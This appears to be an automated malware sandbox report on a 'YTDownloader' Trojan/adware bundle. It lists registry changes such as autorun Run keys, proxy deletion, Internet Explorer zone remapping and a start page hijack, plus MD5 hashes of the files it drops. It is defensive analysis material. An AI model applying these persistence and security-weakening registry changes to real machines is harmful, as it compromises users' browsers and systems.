"Publisher" = "YTDownloader"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ToolboxBitmap32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx, 1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\AniGIFPpg2.AniGIFPpg2.1]
"(Default)" = "AniGIFPpg2 Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\AniGIFCtrl.AniGIF]
"(Default)" = "Animation GIF Control"

[HKCR\AniGIFPpg.AniGIFPpg.1]
"(Default)" = "AniGIFPpg Class"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"Version" = "1.5"
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\AniGIFPpg.AniGIFPpg.1\CLSID]
"(Default)" = "{6DC82D15-92F2-11D1-A255-00A0C932C7DF}"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\0\win32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 78 E1 EC F4 88 67 E6 E4 E2 59 93 7B 49 72 0C"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKLM\SOFTWARE\YTDownloader]
"Version" = "1.0.11487.1216"

[HKLM\SOFTWARE\YTDownloader\Video Converter]
"Install" = "%Program Files%\YTDownloader\"

[HKCR\AniGIFPpg2.AniGIFPpg2.1\CLSID]
"(Default)" = "{61AB12E1-A5FF-11D1-B2E9-444553540000}"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb\0]
"(Default)" = "&Properties,0,2"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\TypeLib]
"Version" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AniGIFPpg.AniGIFPpg\CurVer]
"(Default)" = "AniGIFPpg.AniGIFPpg.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"XMLLookup" = "http://www.fileextensionpro.com/redir.aspx?s=&LangID=x&Ext=%s&"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\FLAGS]
"(Default)" = "2"

[HKCU\Software\YTDownloader]
"Version" = "1.0.11487.1216"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"DisplayIcon" = "%Program Files%\YTDownloader\YTDownloader.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"net.exe" = "Net Command"

[HKCR\AniGIFPpg2.AniGIFPpg2\CurVer]
"(Default)" = "AniGIFPpg2.AniGIFPpg2.1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus\1]
"(Default)" = "131473"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\AniGIFPpg2.AniGIFPpg2]
"(Default)" = "AniGIFPpg2 Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\AniGIFCtrl.AniGIF\CLSID]
"(Default)" = "{82351441-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}]
"(Default)" = "IAniGIFEvents"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"DisplayName" = "YTDownloader"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ProgID]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}]
"(Default)" = "AniGIFPpg2 Class"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Version]
"(Default)" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb]
"(Default)" = ""

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}]
"(Default)" = "AniGIFPpg Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCR\AniGIFCtrl.AniGIF\Insertable]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\YTDownloader.exe]
"(Default)" = "%Program Files%\YTDownloader\YTDownloader.exe"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\HELPDIR]
"(Default)" = "%Program Files%\YTDownloader\"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Programmable]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"MaxConnectionsPerServer"
"MaxConnectionsPer1_0Server"

The process YTDownloader.exe:2056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\YTDownloader]
"UserId" = "{C41FEF8F-ADBB-4F68-BEA7-CDD74FDBA6CA}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 42 F5 11 75 FC E4 AF A6 B9 C3 E7 91 16 09 E8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\YTDownloader]
"UserId" = "{C41FEF8F-ADBB-4F68-BEA7-CDD74FDBA6CA}"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process tcpsvcs.exe:2536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Plus" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\SearchModulePlus\Info]
"ExeLocation" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"DisplayIcon" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\SearchModulePlus\Info]
"Aff" = "F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\SearchModulePlus\Info]
"Version" = "2.3.12.1634"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"DisplayName" = "Search Module Plus"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\SearchModulePlus\Info]
"UserId" = "1844237615-1960408961-1801674531"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"(Default)" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"Publisher" = "Goobzo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 9C DE 34 2B 9D B0 BC 36 50 E6 30 DB 3C E2 72"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"UninstallString" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Install" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process tcpsvcs.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A A5 A4 5E 3E 49 99 04 02 43 0F D2 FC F6 93 19"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www-searching.com/?pid=s&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06&vp=ch&prd=set"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process find.exe:2092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB E0 70 36 1F C6 89 49 B0 AE ED 62 4A 2C 64 0D"

Dropped PE files

MD5	File path
b4c79bd938e7a68133ce4989f0796c3e	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Installer\Install_13875\DC%original file name%.exe
b4c79bd938e7a68133ce4989f0796c3e	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Installer\Install_8361\DC%original file name%.exe
05c47da12b0009bd98653f51287f7768	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_9382\bxsdk32.dll
5d669deb08c6a6c70fd2bc96b3af38ac	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_9382\ins_ytd.exe
b4c79bd938e7a68133ce4989f0796c3e	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj3.tmp\DC%original file name%.exe
c5bf0ea484893a959b3ef0e7f041f379	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll
29f111a07a51d38b8379171d3cf39ddb	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe
2dd50829f5ce91e033636553405263ca	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\Updater.exe
a879b0ae2ad98ac8e1c0f8912837eb2d	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll
5931f1438015a3e263226d6ea4a8b182	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\sma.exe
675f7fdc1224c197df5e7eef84d1a8f9	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smci32.dll
10ba4048085923cf264eaeee708e98ab	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smi32.exe
556b1f1d6fd1f191c77b1167cd006abc	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smu.exe
c9828a10a4b5644cf236b1cce749dddb	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smw.sys
45960b40c1ecb75ed5549a80049879e1	c:\Program Files\YTDownloader\AniGIF.ocx
2154c11f1766ef4283ae7d54888125eb	c:\Program Files\YTDownloader\BrowserHelper.exe
2c79072a72a4babbb7b6325e3c435d0d	c:\Program Files\YTDownloader\BrowserHelperSrv.exe
9ab07bbccb138201096388679a8812a3	c:\Program Files\YTDownloader\DownloadAPI.dll
c484a04b0fe5743b1e8e34c70c241f45	c:\Program Files\YTDownloader\DownloadHelper.exe
a97e9c8ebee10ff1df6d73938dcb5502	c:\Program Files\YTDownloader\Unelevate.exe
7c98d6fcf82adc7b0cf14ca04d128655	c:\Program Files\YTDownloader\Updater.exe
9f587355ef340b7f229cb86ebdfcf54f	c:\Program Files\YTDownloader\YTDUninstall.exe
7fd3d9bb2689dbf8e90fb2c1217e1ac1	c:\Program Files\YTDownloader\YTDownloader.exe
56f5838817026eeb7604049304606e00	c:\Program Files\YTDownloader\converter.exe
